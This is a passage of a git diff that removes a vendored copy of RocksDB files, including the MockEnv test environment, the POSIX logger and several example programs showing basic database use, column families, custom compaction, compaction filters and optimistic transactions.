-                                 const EnvOptions& options) override;
-
-  virtual Status ReuseWritableFile(const std::string& fname,
-                                   const std::string& old_fname,
-                                   unique_ptr<WritableFile>* result,
-                                   const EnvOptions& options) override;
-
-  virtual Status NewWritableFile(const std::string& fname,
-                                 unique_ptr<WritableFile>* result,
-                                 const EnvOptions& env_options) override;
-
-  virtual Status NewDirectory(const std::string& name,
-                              unique_ptr<Directory>* result) override;
-
-  virtual Status FileExists(const std::string& fname) override;
-
-  virtual Status GetChildren(const std::string& dir,
-                             std::vector<std::string>* result) override;
-
-  void DeleteFileInternal(const std::string& fname);
-
-  virtual Status DeleteFile(const std::string& fname) override;
-
-  virtual Status CreateDir(const std::string& dirname) override;
-
-  virtual Status CreateDirIfMissing(const std::string& dirname) override;
-
-  virtual Status DeleteDir(const std::string& dirname) override;
-
-  virtual Status GetFileSize(const std::string& fname,
-                             uint64_t* file_size) override;
-
-  virtual Status GetFileModificationTime(const std::string& fname,
-                                         uint64_t* time) override;
-
-  virtual Status RenameFile(const std::string& src,
-                            const std::string& target) override;
-
-  virtual Status LinkFile(const std::string& src,
-                          const std::string& target) override;
-
-  virtual Status NewLogger(const std::string& fname,
-                           shared_ptr<Logger>* result) override;
-
-  virtual Status LockFile(const std::string& fname, FileLock** flock) override;
-
-  virtual Status UnlockFile(FileLock* flock) override;
-
-  virtual Status GetTestDirectory(std::string* path) override;
-
-  // Results of these can be affected by FakeSleepForMicroseconds()
-  virtual Status GetCurrentTime(int64_t* unix_time) override;
-  virtual uint64_t NowMicros() override;
-  virtual uint64_t NowNanos() override;
-
-  // Non-virtual functions, specific to MockEnv
-  Status Truncate(const std::string& fname, size_t size);
-
-  Status CorruptBuffer(const std::string& fname);
-
-  // Doesn't really sleep, just affects output of GetCurrentTime(), NowMicros()
-  // and NowNanos()
-  void FakeSleepForMicroseconds(int64_t micros);
-
- private:
-  std::string NormalizePath(const std::string path);
-
-  // Map from filenames to MemFile objects, representing a simple file system.
-  typedef std::map<std::string, MemFile*> FileSystem;
-  port::Mutex mutex_;
-  FileSystem file_map_;  // Protected by mutex_.
-
-  std::atomic<int64_t> fake_sleep_micros_;
-};
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/env/mock_env_test.cc b/thirdparty/rocksdb/env/mock_env_test.cc
deleted file mode 100644
index 19e259c..0000000
--- a/thirdparty/rocksdb/env/mock_env_test.cc
+++ /dev/null
@@ -1,85 +0,0 @@
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-#include "env/mock_env.h"
-
-#include <memory>
-#include <string>
-
-#include "rocksdb/env.h"
-#include "util/testharness.h"
-
-namespace rocksdb {
-
-class MockEnvTest : public testing::Test {
- public:
-  MockEnv* env_;
-  const EnvOptions soptions_;
-
-  MockEnvTest()
-      : env_(new MockEnv(Env::Default())) {
-  }
-  ~MockEnvTest() {
-    delete env_;
-  }
-};
-
-TEST_F(MockEnvTest, Corrupt) {
-  const std::string kGood = "this is a good string, synced to disk";
-  const std::string kCorrupted = "this part may be corrupted";
-  const std::string kFileName = "/dir/f";
-  unique_ptr<WritableFile> writable_file;
-  ASSERT_OK(env_->NewWritableFile(kFileName, &writable_file, soptions_));
-  ASSERT_OK(writable_file->Append(kGood));
-  ASSERT_TRUE(writable_file->GetFileSize() == kGood.size());
-
-  std::string scratch;
-  scratch.resize(kGood.size() + kCorrupted.size() + 16);
-  Slice result;
-  unique_ptr<RandomAccessFile> rand_file;
-  ASSERT_OK(env_->NewRandomAccessFile(kFileName, &rand_file, soptions_));
-  ASSERT_OK(rand_file->Read(0, kGood.size(), &result, &(scratch[0])));
-  ASSERT_EQ(result.compare(kGood), 0);
-
-  // Sync + corrupt => no change
-  ASSERT_OK(writable_file->Fsync());
-  ASSERT_OK(dynamic_cast<MockEnv*>(env_)->CorruptBuffer(kFileName));
-  result.clear();
-  ASSERT_OK(rand_file->Read(0, kGood.size(), &result, &(scratch[0])));
-  ASSERT_EQ(result.compare(kGood), 0);
-
-  // Add new data and corrupt it
-  ASSERT_OK(writable_file->Append(kCorrupted));
-  ASSERT_TRUE(writable_file->GetFileSize() == kGood.size() + kCorrupted.size());
-  result.clear();
-  ASSERT_OK(rand_file->Read(kGood.size(), kCorrupted.size(),
-            &result, &(scratch[0])));
-  ASSERT_EQ(result.compare(kCorrupted), 0);
-  // Corrupted
-  ASSERT_OK(dynamic_cast<MockEnv*>(env_)->CorruptBuffer(kFileName));
-  result.clear();
-  ASSERT_OK(rand_file->Read(kGood.size(), kCorrupted.size(),
-            &result, &(scratch[0])));
-  ASSERT_NE(result.compare(kCorrupted), 0);
-}
-
-TEST_F(MockEnvTest, FakeSleeping) {
-  int64_t now = 0;
-  auto s = env_->GetCurrentTime(&now);
-  ASSERT_OK(s);
-  env_->FakeSleepForMicroseconds(3 * 1000 * 1000);
-  int64_t after_sleep = 0;
-  s = env_->GetCurrentTime(&after_sleep);
-  ASSERT_OK(s);
-  auto delta = after_sleep - now;
-  // this will be true unless test runs for 2 seconds
-  ASSERT_TRUE(delta == 3 || delta == 4);
-}
-
-}  // namespace rocksdb
-
-int main(int argc, char** argv) {
-  ::testing::InitGoogleTest(&argc, argv);
-  return RUN_ALL_TESTS();
-}
diff --git a/thirdparty/rocksdb/env/posix_logger.h b/thirdparty/rocksdb/env/posix_logger.h
deleted file mode 100644
index 3ec6f57..0000000
--- a/thirdparty/rocksdb/env/posix_logger.h
+++ /dev/null
@@ -1,169 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-//
-// Logger implementation that can be shared by all environments
-// where enough posix functionality is available.
-
-#pragma once
-#include <algorithm>
-#include <stdio.h>
-#include "port/sys_time.h"
-#include <time.h>
-#include <fcntl.h>
-
-#ifdef OS_LINUX
-#ifndef FALLOC_FL_KEEP_SIZE
-#include <linux/falloc.h>
-#endif
-#endif
-
-#include <atomic>
-#include "monitoring/iostats_context_imp.h"
-#include "rocksdb/env.h"
-#include "util/sync_point.h"
-
-namespace rocksdb {
-
-class PosixLogger : public Logger {
- private:
-  FILE* file_;
-  uint64_t (*gettid_)();  // Return the thread id for the current thread
-  std::atomic_size_t log_size_;
-  int fd_;
-  const static uint64_t flush_every_seconds_ = 5;
-  std::atomic_uint_fast64_t last_flush_micros_;
-  Env* env_;
-  std::atomic<bool> flush_pending_;
- public:
-  PosixLogger(FILE* f, uint64_t (*gettid)(), Env* env,
-              const InfoLogLevel log_level = InfoLogLevel::ERROR_LEVEL)
-      : Logger(log_level),
-        file_(f),
-        gettid_(gettid),
-        log_size_(0),
-        fd_(fileno(f)),
-        last_flush_micros_(0),
-        env_(env),
-        flush_pending_(false) {}
-  virtual ~PosixLogger() {
-    fclose(file_);
-  }
-  virtual void Flush() override {
-    TEST_SYNC_POINT("PosixLogger::Flush:Begin1");
-    TEST_SYNC_POINT("PosixLogger::Flush:Begin2");
-    if (flush_pending_) {
-      flush_pending_ = false;
-      fflush(file_);
-    }
-    last_flush_micros_ = env_->NowMicros();
-  }
-
-  using Logger::Logv;
-  virtual void Logv(const char* format, va_list ap) override {
-    IOSTATS_TIMER_GUARD(logger_nanos);
-
-    const uint64_t thread_id = (*gettid_)();
-
-    // We try twice: the first time with a fixed-size stack allocated buffer,
-    // and the second time with a much larger dynamically allocated buffer.
-    char buffer[500];
-    for (int iter = 0; iter < 2; iter++) {
-      char* base;
-      int bufsize;
-      if (iter == 0) {
-        bufsize = sizeof(buffer);
-        base = buffer;
-      } else {
-        bufsize = 65536;
-        base = new char[bufsize];
-      }
-      char* p = base;
-      char* limit = base + bufsize;
-
-      struct timeval now_tv;
-      gettimeofday(&now_tv, nullptr);
-      const time_t seconds = now_tv.tv_sec;
-      struct tm t;
-      localtime_r(&seconds, &t);
-      p += snprintf(p, limit - p,
-                    "%04d/%02d/%02d-%02d:%02d:%02d.%06d %llx ",
-                    t.tm_year + 1900,
-                    t.tm_mon + 1,
-                    t.tm_mday,
-                    t.tm_hour,
-                    t.tm_min,
-                    t.tm_sec,
-                    static_cast<int>(now_tv.tv_usec),
-                    static_cast<long long unsigned int>(thread_id));
-
-      // Print the message
-      if (p < limit) {
-        va_list backup_ap;
-        va_copy(backup_ap, ap);
-        p += vsnprintf(p, limit - p, format, backup_ap);
-        va_end(backup_ap);
-      }
-
-      // Truncate to available space if necessary
-      if (p >= limit) {
-        if (iter == 0) {
-          continue;       // Try again with larger buffer
-        } else {
-          p = limit - 1;
-        }
-      }
-
-      // Add newline if necessary
-      if (p == base || p[-1] != '\n') {
-        *p++ = '\n';
-      }
-
-      assert(p <= limit);
-      const size_t write_size = p - base;
-
-#ifdef ROCKSDB_FALLOCATE_PRESENT
-      const int kDebugLogChunkSize = 128 * 1024;
-
-      // If this write would cross a boundary of kDebugLogChunkSize
-      // space, pre-allocate more space to avoid overly large
-      // allocations from filesystem allocsize options.
-      const size_t log_size = log_size_;
-      const size_t last_allocation_chunk =
-        ((kDebugLogChunkSize - 1 + log_size) / kDebugLogChunkSize);
-      const size_t desired_allocation_chunk =
-        ((kDebugLogChunkSize - 1 + log_size + write_size) /
-           kDebugLogChunkSize);
-      if (last_allocation_chunk != desired_allocation_chunk) {
-        fallocate(
-            fd_, FALLOC_FL_KEEP_SIZE, 0,
-            static_cast<off_t>(desired_allocation_chunk * kDebugLogChunkSize));
-      }
-#endif
-
-      size_t sz = fwrite(base, 1, write_size, file_);
-      flush_pending_ = true;
-      assert(sz == write_size);
-      if (sz > 0) {
-        log_size_ += write_size;
-      }
-      uint64_t now_micros = static_cast<uint64_t>(now_tv.tv_sec) * 1000000 +
-        now_tv.tv_usec;
-      if (now_micros - last_flush_micros_ >= flush_every_seconds_ * 1000000) {
-        Flush();
-      }
-      if (base != buffer) {
-        delete[] base;
-      }
-      break;
-    }
-  }
-  size_t GetLogFileSize() const override { return log_size_; }
-};
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/examples/.gitignore b/thirdparty/rocksdb/examples/.gitignore
deleted file mode 100644
index b5a05e4..0000000
--- a/thirdparty/rocksdb/examples/.gitignore
+++ /dev/null
@@ -1,8 +0,0 @@
-c_simple_example
-column_families_example
-compact_files_example
-compaction_filter_example
-optimistic_transaction_example
-options_file_example
-simple_example
-transaction_example
diff --git a/thirdparty/rocksdb/examples/Makefile b/thirdparty/rocksdb/examples/Makefile
deleted file mode 100644
index 57cd1a7..0000000
--- a/thirdparty/rocksdb/examples/Makefile
+++ /dev/null
@@ -1,50 +0,0 @@
-include ../make_config.mk
-
-ifndef DISABLE_JEMALLOC
-	ifdef JEMALLOC
-		PLATFORM_CXXFLAGS += -DROCKSDB_JEMALLOC -DJEMALLOC_NO_DEMANGLE
-	endif
-	EXEC_LDFLAGS := $(JEMALLOC_LIB) $(EXEC_LDFLAGS) -lpthread
-	PLATFORM_CXXFLAGS += $(JEMALLOC_INCLUDE)
-endif
-
-ifneq ($(USE_RTTI), 1)
-	CXXFLAGS += -fno-rtti
-endif
-
-.PHONY: clean librocksdb
-
-all: simple_example column_families_example compact_files_example c_simple_example optimistic_transaction_example transaction_example compaction_filter_example options_file_example
-
-simple_example: librocksdb simple_example.cc
-	$(CXX) $(CXXFLAGS) $@.cc -o$@ ../librocksdb.a -I../include -O2 -std=c++11 $(PLATFORM_LDFLAGS) $(PLATFORM_CXXFLAGS) $(EXEC_LDFLAGS)
-
-column_families_example: librocksdb column_families_example.cc
-	$(CXX) $(CXXFLAGS) $@.cc -o$@ ../librocksdb.a -I../include -O2 -std=c++11 $(PLATFORM_LDFLAGS) $(PLATFORM_CXXFLAGS) $(EXEC_LDFLAGS)
-
-compaction_filter_example: librocksdb compaction_filter_example.cc
-	$(CXX) $(CXXFLAGS) $@.cc -o$@ ../librocksdb.a -I../include -O2 -std=c++11 $(PLATFORM_LDFLAGS) $(PLATFORM_CXXFLAGS) $(EXEC_LDFLAGS)
-
-compact_files_example: librocksdb compact_files_example.cc
-	$(CXX) $(CXXFLAGS) $@.cc -o$@ ../librocksdb.a -I../include -O2 -std=c++11 $(PLATFORM_LDFLAGS) $(PLATFORM_CXXFLAGS) $(EXEC_LDFLAGS)
-
-.c.o:
-	$(CC) $(CFLAGS) -c $< -o $@ -I../include
-
-c_simple_example: librocksdb c_simple_example.o
-	$(CXX) $@.o -o$@ ../librocksdb.a $(PLATFORM_LDFLAGS) $(EXEC_LDFLAGS)
-
-optimistic_transaction_example: librocksdb optimistic_transaction_example.cc
-	$(CXX) $(CXXFLAGS) $@.cc -o$@ ../librocksdb.a -I../include -O2 -std=c++11 $(PLATFORM_LDFLAGS) $(PLATFORM_CXXFLAGS) $(EXEC_LDFLAGS)
-
-transaction_example: librocksdb transaction_example.cc
-	$(CXX) $(CXXFLAGS) $@.cc -o$@ ../librocksdb.a -I../include -O2 -std=c++11 $(PLATFORM_LDFLAGS) $(PLATFORM_CXXFLAGS) $(EXEC_LDFLAGS)
-
-options_file_example: librocksdb options_file_example.cc
-	$(CXX) $(CXXFLAGS) $@.cc -o$@ ../librocksdb.a -I../include -O2 -std=c++11 $(PLATFORM_LDFLAGS) $(PLATFORM_CXXFLAGS) $(EXEC_LDFLAGS)
-
-clean:
-	rm -rf ./simple_example ./column_families_example ./compact_files_example ./compaction_filter_example ./c_simple_example c_simple_example.o ./optimistic_transaction_example ./transaction_example ./options_file_example
-
-librocksdb:
-	cd .. && $(MAKE) static_lib
diff --git a/thirdparty/rocksdb/examples/README.md b/thirdparty/rocksdb/examples/README.md
deleted file mode 100644
index f4ba238..0000000
--- a/thirdparty/rocksdb/examples/README.md
+++ /dev/null
@@ -1,2 +0,0 @@
-1. Compile RocksDB first by executing `make static_lib` in parent dir
-2. Compile all examples: `cd examples/; make all`
diff --git a/thirdparty/rocksdb/examples/c_simple_example.c b/thirdparty/rocksdb/examples/c_simple_example.c
deleted file mode 100644
index 5564361..0000000
--- a/thirdparty/rocksdb/examples/c_simple_example.c
+++ /dev/null
@@ -1,79 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#include <stdio.h>
-#include <string.h>
-#include <stdlib.h>
-#include <assert.h>
-
-#include "rocksdb/c.h"
-
-#include <unistd.h>  // sysconf() - get CPU count
-
-const char DBPath[] = "/tmp/rocksdb_simple_example";
-const char DBBackupPath[] = "/tmp/rocksdb_simple_example_backup";
-
-int main(int argc, char **argv) {
-  rocksdb_t *db;
-  rocksdb_backup_engine_t *be;
-  rocksdb_options_t *options = rocksdb_options_create();
-  // Optimize RocksDB. This is the easiest way to
-  // get RocksDB to perform well
-  long cpus = sysconf(_SC_NPROCESSORS_ONLN);  // get # of online cores
-  rocksdb_options_increase_parallelism(options, (int)(cpus));
-  rocksdb_options_optimize_level_style_compaction(options, 0);
-  // create the DB if it's not already present
-  rocksdb_options_set_create_if_missing(options, 1);
-
-  // open DB
-  char *err = NULL;
-  db = rocksdb_open(options, DBPath, &err);
-  assert(!err);
-
-  // open Backup Engine that we will use for backing up our database
-  be = rocksdb_backup_engine_open(options, DBBackupPath, &err);
-  assert(!err);
-
-  // Put key-value
-  rocksdb_writeoptions_t *writeoptions = rocksdb_writeoptions_create();
-  const char key[] = "key";
-  const char *value = "value";
-  rocksdb_put(db, writeoptions, key, strlen(key), value, strlen(value) + 1,
-              &err);
-  assert(!err);
-  // Get value
-  rocksdb_readoptions_t *readoptions = rocksdb_readoptions_create();
-  size_t len;
-  char *returned_value =
-      rocksdb_get(db, readoptions, key, strlen(key), &len, &err);
-  assert(!err);
-  assert(strcmp(returned_value, "value") == 0);
-  free(returned_value);
-
-  // create new backup in a directory specified by DBBackupPath
-  rocksdb_backup_engine_create_new_backup(be, db, &err);
-  assert(!err);
-
-  rocksdb_close(db);
-
-  // If something is wrong, you might want to restore data from last backup
-  rocksdb_restore_options_t *restore_options = rocksdb_restore_options_create();
-  rocksdb_backup_engine_restore_db_from_latest_backup(be, DBPath, DBPath,
-                                                      restore_options, &err);
-  assert(!err);
-  rocksdb_restore_options_destroy(restore_options);
-
-  db = rocksdb_open(options, DBPath, &err);
-  assert(!err);
-
-  // cleanup
-  rocksdb_writeoptions_destroy(writeoptions);
-  rocksdb_readoptions_destroy(readoptions);
-  rocksdb_options_destroy(options);
-  rocksdb_backup_engine_close(be);
-  rocksdb_close(db);
-
-  return 0;
-}
diff --git a/thirdparty/rocksdb/examples/column_families_example.cc b/thirdparty/rocksdb/examples/column_families_example.cc
deleted file mode 100644
index 589ff8e..0000000
--- a/thirdparty/rocksdb/examples/column_families_example.cc
+++ /dev/null
@@ -1,72 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-#include <cstdio>
-#include <string>
-#include <vector>
-
-#include "rocksdb/db.h"
-#include "rocksdb/slice.h"
-#include "rocksdb/options.h"
-
-using namespace rocksdb;
-
-std::string kDBPath = "/tmp/rocksdb_column_families_example";
-
-int main() {
-  // open DB
-  Options options;
-  options.create_if_missing = true;
-  DB* db;
-  Status s = DB::Open(options, kDBPath, &db);
-  assert(s.ok());
-
-  // create column family
-  ColumnFamilyHandle* cf;
-  s = db->CreateColumnFamily(ColumnFamilyOptions(), "new_cf", &cf);
-  assert(s.ok());
-
-  // close DB
-  delete cf;
-  delete db;
-
-  // open DB with two column families
-  std::vector<ColumnFamilyDescriptor> column_families;
-  // have to open default column family
-  column_families.push_back(ColumnFamilyDescriptor(
-      kDefaultColumnFamilyName, ColumnFamilyOptions()));
-  // open the new one, too
-  column_families.push_back(ColumnFamilyDescriptor(
-      "new_cf", ColumnFamilyOptions()));
-  std::vector<ColumnFamilyHandle*> handles;
-  s = DB::Open(DBOptions(), kDBPath, column_families, &handles, &db);
-  assert(s.ok());
-
-  // put and get from non-default column family
-  s = db->Put(WriteOptions(), handles[1], Slice("key"), Slice("value"));
-  assert(s.ok());
-  std::string value;
-  s = db->Get(ReadOptions(), handles[1], Slice("key"), &value);
-  assert(s.ok());
-
-  // atomic write
-  WriteBatch batch;
-  batch.Put(handles[0], Slice("key2"), Slice("value2"));
-  batch.Put(handles[1], Slice("key3"), Slice("value3"));
-  batch.Delete(handles[0], Slice("key"));
-  s = db->Write(WriteOptions(), &batch);
-  assert(s.ok());
-
-  // drop column family
-  s = db->DropColumnFamily(handles[1]);
-  assert(s.ok());
-
-  // close db
-  for (auto handle : handles) {
-    delete handle;
-  }
-  delete db;
-
-  return 0;
-}
diff --git a/thirdparty/rocksdb/examples/compact_files_example.cc b/thirdparty/rocksdb/examples/compact_files_example.cc
deleted file mode 100644
index c27df8e..0000000
--- a/thirdparty/rocksdb/examples/compact_files_example.cc
+++ /dev/null
@@ -1,171 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// An example code demonstrating how to use CompactFiles, EventListener,
-// and GetColumnFamilyMetaData APIs to implement custom compaction algorithm.
-
-#include <mutex>
-#include <string>
-#include "rocksdb/db.h"
-#include "rocksdb/env.h"
-#include "rocksdb/options.h"
-
-using namespace rocksdb;
-std::string kDBPath = "/tmp/rocksdb_compact_files_example";
-struct CompactionTask;
-
-// This is an example interface of external-compaction algorithm.
-// Compaction algorithm can be implemented outside the core-RocksDB
-// code by using the pluggable compaction APIs that RocksDb provides.
-class Compactor : public EventListener {
- public:
-  // Picks and returns a compaction task given the specified DB
-  // and column family.  It is the caller's responsibility to
-  // destroy the returned CompactionTask.  Returns "nullptr"
-  // if it cannot find a proper compaction task.
-  virtual CompactionTask* PickCompaction(
-      DB* db, const std::string& cf_name) = 0;
-
-  // Schedule and run the specified compaction task in background.
-  virtual void ScheduleCompaction(CompactionTask *task) = 0;
-};
-
-// Example structure that describes a compaction task.
-struct CompactionTask {
-  CompactionTask(
-      DB* _db, Compactor* _compactor,
-      const std::string& _column_family_name,
-      const std::vector<std::string>& _input_file_names,
-      const int _output_level,
-      const CompactionOptions& _compact_options,
-      bool _retry_on_fail)
-          : db(_db),
-            compactor(_compactor),
-            column_family_name(_column_family_name),
-            input_file_names(_input_file_names),
-            output_level(_output_level),
-            compact_options(_compact_options),
-            retry_on_fail(_retry_on_fail) {}
-  DB* db;
-  Compactor* compactor;
-  const std::string& column_family_name;
-  std::vector<std::string> input_file_names;
-  int output_level;
-  CompactionOptions compact_options;
-  bool retry_on_fail;
-};
-
-// A simple compaction algorithm that always compacts everything
-// to the highest level whenever possible.
-class FullCompactor : public Compactor {
- public:
-  explicit FullCompactor(const Options options) : options_(options) {
-    compact_options_.compression = options_.compression;
-    compact_options_.output_file_size_limit =
-        options_.target_file_size_base;
-  }
-
-  // When flush happens, it determines whether to trigger compaction. If
-  // triggered_writes_stop is true, it will also set the retry flag of
-  // compaction-task to true.
-  void OnFlushCompleted(
-      DB* db, const FlushJobInfo& info) override {
-    CompactionTask* task = PickCompaction(db, info.cf_name);
-    if (task != nullptr) {
-      if (info.triggered_writes_stop) {
-        task->retry_on_fail = true;
-      }
-      // Schedule compaction in a different thread.
-      ScheduleCompaction(task);
-    }
-  }
-
-  // Always pick a compaction which includes all files whenever possible.
-  CompactionTask* PickCompaction(
-      DB* db, const std::string& cf_name) override {
-    ColumnFamilyMetaData cf_meta;
-    db->GetColumnFamilyMetaData(&cf_meta);
-
-    std::vector<std::string> input_file_names;
-    for (auto level : cf_meta.levels) {
-      for (auto file : level.files) {
-        if (file.being_compacted) {
-          return nullptr;
-        }
-        input_file_names.push_back(file.name);
-      }
-    }
-    return new CompactionTask(
-        db, this, cf_name, input_file_names,
-        options_.num_levels - 1, compact_options_, false);
-  }
-
-  // Schedule the specified compaction task in background.
-  void ScheduleCompaction(CompactionTask* task) override {
-    options_.env->Schedule(&FullCompactor::CompactFiles, task);
-  }
-
-  static void CompactFiles(void* arg) {
-    std::unique_ptr<CompactionTask> task(
-        reinterpret_cast<CompactionTask*>(arg));
-    assert(task);
-    assert(task->db);
-    Status s = task->db->CompactFiles(
-        task->compact_options,
-        task->input_file_names,
-        task->output_level);
-    printf("CompactFiles() finished with status %s\n", s.ToString().c_str());
-    if (!s.ok() && !s.IsIOError() && task->retry_on_fail) {
-      // If a compaction task with its retry_on_fail=true failed,
-      // try to schedule another compaction in case the reason
-      // is not an IO error.
-      CompactionTask* new_task = task->compactor->PickCompaction(
-          task->db, task->column_family_name);
-      task->compactor->ScheduleCompaction(new_task);
-    }
-  }
-
- private:
-  Options options_;
-  CompactionOptions compact_options_;
-};
-
-int main() {
-  Options options;
-  options.create_if_missing = true;
-  // Disable RocksDB background compaction.
-  options.compaction_style = kCompactionStyleNone;
-  // Small slowdown and stop trigger for experimental purpose.
-  options.level0_slowdown_writes_trigger = 3;
-  options.level0_stop_writes_trigger = 5;
-  options.IncreaseParallelism(5);
-  options.listeners.emplace_back(new FullCompactor(options));
-
-  DB* db = nullptr;
-  DestroyDB(kDBPath, options);
-  Status s = DB::Open(options, kDBPath, &db);
-  assert(s.ok());
-  assert(db);
-
-  // if background compaction is not working, write will stall
-  // because of options.level0_stop_writes_trigger
-  for (int i = 1000; i < 99999; ++i) {
-    db->Put(WriteOptions(), std::to_string(i),
-                            std::string(500, 'a' + (i % 26)));
-  }
-
-  // verify the values are still there
-  std::string value;
-  for (int i = 1000; i < 99999; ++i) {
-    db->Get(ReadOptions(), std::to_string(i),
-                           &value);
-    assert(value == std::string(500, 'a' + (i % 26)));
-  }
-
-  // close the db.
-  delete db;
-
-  return 0;
-}
diff --git a/thirdparty/rocksdb/examples/compaction_filter_example.cc b/thirdparty/rocksdb/examples/compaction_filter_example.cc
deleted file mode 100644
index 226dfe7..0000000
--- a/thirdparty/rocksdb/examples/compaction_filter_example.cc
+++ /dev/null
@@ -1,87 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#include <rocksdb/compaction_filter.h>
-#include <rocksdb/db.h>
-#include <rocksdb/merge_operator.h>
-#include <rocksdb/options.h>
-
-class MyMerge : public rocksdb::MergeOperator {
- public:
-  virtual bool FullMergeV2(const MergeOperationInput& merge_in,
-                           MergeOperationOutput* merge_out) const override {
-    merge_out->new_value.clear();
-    if (merge_in.existing_value != nullptr) {
-      merge_out->new_value.assign(merge_in.existing_value->data(),
-                                  merge_in.existing_value->size());
-    }
-    for (const rocksdb::Slice& m : merge_in.operand_list) {
-      fprintf(stderr, "Merge(%s)\n", m.ToString().c_str());
-      // the compaction filter filters out bad values
-      assert(m.ToString() != "bad");
-      merge_out->new_value.assign(m.data(), m.size());
-    }
-    return true;
-  }
-
-  const char* Name() const override { return "MyMerge"; }
-};
-
-class MyFilter : public rocksdb::CompactionFilter {
- public:
-  bool Filter(int level, const rocksdb::Slice& key,
-              const rocksdb::Slice& existing_value, std::string* new_value,
-              bool* value_changed) const override {
-    fprintf(stderr, "Filter(%s)\n", key.ToString().c_str());
-    ++count_;
-    assert(*value_changed == false);
-    return false;
-  }
-
-  bool FilterMergeOperand(int level, const rocksdb::Slice& key,
-                          const rocksdb::Slice& existing_value) const override {
-    fprintf(stderr, "FilterMerge(%s)\n", key.ToString().c_str());
-    ++merge_count_;
-    return existing_value == "bad";
-  }
-
-  const char* Name() const override { return "MyFilter"; }
-
-  mutable int count_ = 0;
-  mutable int merge_count_ = 0;
-};
-
-int main() {
-  rocksdb::DB* raw_db;
-  rocksdb::Status status;
-
-  MyFilter filter;
-
-  int ret = system("rm -rf /tmp/rocksmergetest");
-  if (ret != 0) {
-    fprintf(stderr, "Error deleting /tmp/rocksmergetest, code: %d\n", ret);
-    return ret;
-  }
-  rocksdb::Options options;
-  options.create_if_missing = true;
-  options.merge_operator.reset(new MyMerge);
-  options.compaction_filter = &filter;
-  status = rocksdb::DB::Open(options, "/tmp/rocksmergetest", &raw_db);
-  assert(status.ok());
-  std::unique_ptr<rocksdb::DB> db(raw_db);
-
-  rocksdb::WriteOptions wopts;
-  db->Merge(wopts, "0", "bad");  // This is filtered out
-  db->Merge(wopts, "1", "data1");
-  db->Merge(wopts, "1", "bad");
-  db->Merge(wopts, "1", "data2");
-  db->Merge(wopts, "1", "bad");
-  db->Merge(wopts, "3", "data3");
-  db->CompactRange(rocksdb::CompactRangeOptions(), nullptr, nullptr);
-  fprintf(stderr, "filter.count_ = %d\n", filter.count_);
-  assert(filter.count_ == 0);
-  fprintf(stderr, "filter.merge_count_ = %d\n", filter.merge_count_);
-  assert(filter.merge_count_ == 6);
-}
diff --git a/thirdparty/rocksdb/examples/optimistic_transaction_example.cc b/thirdparty/rocksdb/examples/optimistic_transaction_example.cc
deleted file mode 100644
index 94444e1..0000000
--- a/thirdparty/rocksdb/examples/optimistic_transaction_example.cc
+++ /dev/null
@@ -1,142 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#ifndef ROCKSDB_LITE
-
-#include "rocksdb/db.h"
-#include "rocksdb/options.h"
-#include "rocksdb/slice.h"
-#include "rocksdb/utilities/transaction.h"
-#include "rocksdb/utilities/optimistic_transaction_db.h"
-
-using namespace rocksdb;
-
-std::string kDBPath = "/tmp/rocksdb_transaction_example";
-
-int main() {
-  // open DB
-  Options options;
-  options.create_if_missing = true;
-  DB* db;
-  OptimisticTransactionDB* txn_db;
-
-  Status s = OptimisticTransactionDB::Open(options, kDBPath, &txn_db);
-  assert(s.ok());
-  db = txn_db->GetBaseDB();
-
-  WriteOptions write_options;
-  ReadOptions read_options;
-  OptimisticTransactionOptions txn_options;
-  std::string value;
-
-  ////////////////////////////////////////////////////////
-  //
-  // Simple OptimisticTransaction Example ("Read Committed")
-  //
-  ////////////////////////////////////////////////////////
-
-  // Start a transaction
-  Transaction* txn = txn_db->BeginTransaction(write_options);
-  assert(txn);
-
-  // Read a key in this transaction
-  s = txn->Get(read_options, "abc", &value);
-  assert(s.IsNotFound());
-
-  // Write a key in this transaction
-  txn->Put("abc", "def");
-
-  // Read a key OUTSIDE this transaction. Does not affect txn.
-  s = db->Get(read_options, "abc", &value);
-
-  // Write a key OUTSIDE of this transaction.
-  // Does not affect txn since this is an unrelated key.  If we wrote key 'abc'
-  // here, the transaction would fail to commit.
-  s = db->Put(write_options, "xyz", "zzz");
-
-  // Commit transaction
-  s = txn->Commit();
-  assert(s.ok());
-  delete txn;
-
-  ////////////////////////////////////////////////////////
-  //
-  // "Repeatable Read" (Snapshot Isolation) Example
-  //   -- Using a single Snapshot
-  //
-  ////////////////////////////////////////////////////////
-
-  // Set a snapshot at start of transaction by setting set_snapshot=true
-  txn_options.set_snapshot = true;
-  txn = txn_db->BeginTransaction(write_options, txn_options);
-
-  const Snapshot* snapshot = txn->GetSnapshot();
-
-  // Write a key OUTSIDE of transaction
-  db->Put(write_options, "abc", "xyz");
-
-  // Read a key using the snapshot
-  read_options.snapshot = snapshot;
